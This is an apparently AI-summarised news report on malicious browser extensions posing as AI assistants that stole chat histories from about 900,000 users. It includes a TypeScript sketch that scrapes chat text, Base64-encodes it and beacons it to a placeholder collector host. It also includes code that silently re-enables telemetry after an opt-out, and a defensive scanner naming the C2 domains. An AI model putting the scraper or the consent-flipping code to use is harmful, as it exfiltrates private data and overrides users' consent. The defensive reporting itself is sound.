Silent Moles in the Sidebar: Malicious AI Extensions Harvest 900,000 Chat Histories in Global Breach

Summarized by NextFin AI
  • A sophisticated data-harvesting campaign has infiltrated the corporate AI sector, using malicious browser extensions to siphon sensitive chat and browsing data from nearly 900,000 users.
  • The attack exploits the sidebar trend in browser UX, allowing extensions to gain broad permissions and record internal corporate data.
  • Attackers are not just stealing individual secrets; by aggregating sensitive information such as unreleased code and legal queries, they are building a high-resolution database of corporate activity.
  • This incident highlights the structural fragility of the browser-as-an-OS model, raising concerns over user trust in marketplace-verified tools amidst rapid AI integration.

NextFin News - A sophisticated data-harvesting campaign has infiltrated the heart of the corporate AI boom, turning the very tools designed for productivity into silent conduits for industrial espionage. On March 5, 2026, Microsoft Defender researchers revealed that a series of malicious Chromium-based browser extensions, masquerading as legitimate AI assistants for platforms like ChatGPT and DeepSeek, have successfully harvested the chat histories and browsing data of nearly 900,000 users. The breach is particularly acute in the professional sector, with Microsoft confirming malicious activity across more than 20,000 enterprise tenants where sensitive proprietary data is routinely processed.

The mechanics of the attack exploit the "sidebar" trend that has dominated browser UX since the 2025 AI surge. By mimicking the branding and interface of popular tools like AITOPIA, these extensions—distributed through the official Chrome Web Store—gained broad page-level permissions from unsuspecting knowledge workers. Once installed, the extensions do not just facilitate AI interactions; they record every prompt, response, and URL visited. This includes internal corporate wikis, staging environments, and strategic planning documents that were never intended to leave the encrypted confines of a company’s network. The stolen data is Base64-encoded and exfiltrated to domains such as deepaichats[.]com and chatsaigpt[.]com, disguised as routine analytics traffic.
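To make the mechanism concrete, the following is a minimal TypeScript sketch of how a content script with broad page permissions could scrape chat text and disguise its exfiltration as analytics traffic. The DOM selectors, payload shape, and placeholder endpoint are assumptions for illustration, not recovered malware code; the real campaign reportedly used the defanged domains named above.

```typescript
// Illustrative sketch only; selectors, payload shape, and endpoint are hypothetical.
// It shows how page-level permissions let an extension read chat content and
// ship it out as an innocuous-looking analytics beacon.

function harvestVisibleChat(): string[] {
  // Collect anything that looks like a prompt or response bubble on the page.
  return Array.from(
    document.querySelectorAll<HTMLElement>("[data-message], .chat-message"),
  )
    .map((el) => el.innerText.trim())
    .filter((text) => text.length > 0);
}

function exfiltrate(messages: string[]): void {
  // Base64-encode the captured text so the request body looks like opaque
  // telemetry rather than readable chat transcripts.
  const payload = btoa(
    unescape(
      encodeURIComponent(
        JSON.stringify({ url: location.href, messages, ts: Date.now() }),
      ),
    ),
  );
  // Stand-in endpoint; the campaign reportedly used deepaichats[.]com and chatsaigpt[.]com.
  navigator.sendBeacon("https://collector.example/metrics", payload);
}

// Re-harvest whenever the conversation DOM changes.
new MutationObserver(() => exfiltrate(harvestVisibleChat())).observe(document.body, {
  childList: true,
  subtree: true,
});
```

Because each request is a small beacon to an unremarkable hostname, it blends into the ordinary telemetry noise that most corporate proxies wave through.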

What makes this campaign uniquely insidious is its persistence through deception. Microsoft’s technical analysis found that even when users manually opted out of data collection, subsequent background updates to the extensions would silently re-enable telemetry. This "consent-flipping" ensures a continuous stream of intelligence for the threat actors. Furthermore, the rise of "agentic browsers"—AI-driven browsers that automate task execution—has inadvertently widened the attack surface. In several documented cases, these automated systems downloaded the malicious extensions without explicit human approval, having been "convinced" by the extensions' high ratings and professional descriptions.
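For readers wondering how an explicit opt-out can simply stop mattering, here is a minimal sketch of the pattern, assuming the preference is kept in extension storage; the storage key and flag are hypothetical, but the structure mirrors the consent-flipping behavior Microsoft describes.

```typescript
// Hypothetical illustration of consent-flipping in a Manifest V3 service worker.
// The storage key "telemetryEnabled" is an assumption for the example.

chrome.runtime.onInstalled.addListener((details) => {
  if (details.reason === "update") {
    // A well-behaved extension would leave the user's stored choice alone here.
    // The malicious pattern instead resets the flag on every background update,
    // silently re-enabling data collection after the user has opted out.
    chrome.storage.local.set({ telemetryEnabled: true });
  }
});
```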

The financial and strategic stakes of such a leak are immense. For a modern enterprise, an LLM chat history is essentially a chronological map of its intellectual property development. It contains snippets of unreleased code, legal queries regarding pending mergers, and the raw logic of proprietary algorithms. By aggregating this data at scale, the attackers are not just stealing individual secrets; they are building a high-resolution database of global corporate activity. The reliance on the Chromium architecture means that both Google Chrome and Microsoft Edge users are equally vulnerable, as the malicious code is compatible with both ecosystems.

Security teams are now facing a reckoning over the "permissive extension" culture that has defined the last year of AI adoption. While U.S. President Trump’s administration has pushed for rapid AI integration to maintain national competitiveness, this incident underscores the structural fragility of the browser-as-an-OS model. The immediate mitigation involves blacklisting specific extension IDs and monitoring for HTTPS POST traffic to known C2 domains, but the broader challenge remains the inherent trust users place in marketplace-verified tools. As AI assistants become more deeply embedded in the professional workflow, the boundary between a helpful co-pilot and a digital mole has never been thinner.
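As a starting point for the traffic-monitoring side of that mitigation, below is a rough TypeScript (Node) sketch that scans a newline-delimited JSON export of proxy logs for POST requests to the two C2 domains named in the report. The log format and field names are assumptions to adapt to whatever your proxy or firewall actually emits; blocklisting the extension IDs themselves is handled separately through managed browser policy rather than in code.

```typescript
// Rough detection sketch; assumes a JSON-lines proxy export with hypothetical
// field names (method, host, clientIp, timestamp). Adapt to your proxy's schema.

import { readFileSync } from "node:fs";

const C2_DOMAINS = ["deepaichats.com", "chatsaigpt.com"];

interface ProxyLogEntry {
  method: string;
  host: string;
  clientIp: string;
  timestamp: string;
}

function findSuspiciousPosts(logPath: string): ProxyLogEntry[] {
  return readFileSync(logPath, "utf8")
    .split("\n")
    .filter((line) => line.trim().length > 0)
    .map((line) => JSON.parse(line) as ProxyLogEntry)
    .filter(
      (entry) =>
        entry.method === "POST" &&
        C2_DOMAINS.some((d) => entry.host === d || entry.host.endsWith("." + d)),
    );
}

// Usage: pass the exported log file as the first argument.
const logPath = process.argv[2] ?? "proxy-export.jsonl";
for (const hit of findSuspiciousPosts(logPath)) {
  console.log(`${hit.timestamp} ${hit.clientIp} -> POST ${hit.host}`);
}
```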

Explore more exclusive insights at nextfin.ai.
